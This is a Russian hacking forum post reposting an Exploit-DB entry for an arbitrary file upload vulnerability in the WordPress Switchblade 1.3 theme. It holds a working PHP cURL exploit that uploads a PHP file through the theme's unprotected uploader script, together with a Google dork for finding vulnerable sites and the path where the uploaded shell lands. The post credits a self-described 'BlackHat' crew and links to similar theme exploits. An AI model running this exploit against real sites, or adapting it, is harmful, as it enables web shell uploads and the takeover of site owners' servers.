Exploit WordPress Theme Switchblade 1.3 - Arbitrary File Upload

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29330
Проверка EDB
  1. Пройдено
Автор
BYAKUYA KOUTA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2013-11-01
WordPress Theme Switchblade 1.3 - Arbitrary File Upload
Код: 
###################################################################################################
#_________            .___        _______                ___.   .__        
#\_   ___ \  ____   __| _/____    \      \   ______  _  _\_ |__ |__| ____  
#/    \  \/ /  _ \ / __ |/ __ \   /   |   \_/ __ \ \/ \/ /| __ \|  |/ __ \ 
#\     \___(  <_> ) /_/ \  ___/  /    |    \  ___/\     / | \_\ \  \  ___/ 
# \______  /\____/\____ |\___  > \____|__  /\___  >\/\_/  |___  /__|\___  >
#        \/            \/    \/          \/     \/            \/        \/ 
###################################################################################################
# Exploit Title: WordPress Switchblade Themes Arbitrary File Upload Vulnerability
# Author: Byakuya
# Date: 11/01/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/switchblade-powerful-wordpress-theme/761353
# Price: $50
# Affected Version: v1.3
# Infected File: php.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/switchblade
# Tested on : Windows/Linux
###################################################################################################

# Exploit & POC :

<?php
$uploadfile="up.php"; 
$ch = curl_init("http://127.0.0.1/wordpress/wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>

#File path: 
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/up.php

#Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Official Code-Newbie
#Facebook: https://www.facebook.com/CodeNewbieCrew
#Website: http://www.codenewbie.net
#Malaysia & Indonesia BlackHat
###################################################################################################
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)
Ответы
0
Просмотры
657
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Theme Elegance - '/elegance/lib/scripts/dl-skin.php' Local File Disclosure
Ответы
0
Просмотры
539
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Theme Authentic - 'download.php' Arbitrary File Download
Ответы
0
Просмотры
499
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Theme Epic - 'download.php' Arbitrary File Download
Ответы
0
Просмотры
530
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Theme Antioch - 'download.php' Arbitrary File Download
Ответы
0
Просмотры
513
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Theme Urban City - 'download.php' Arbitrary File Download
Ответы
0
Просмотры
509
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Theme Infocus - '/infocus/lib/scripts/dl-skin.php' Local File Disclosure
Ответы
0
Просмотры
495
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload
Ответы
0
Просмотры
498
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Theme Kiddo - Arbitrary File Upload
Ответы
0
Просмотры
503
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Theme Suco - 'themify-ajax.php' Arbitrary File Upload
Ответы
0
Просмотры
490
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу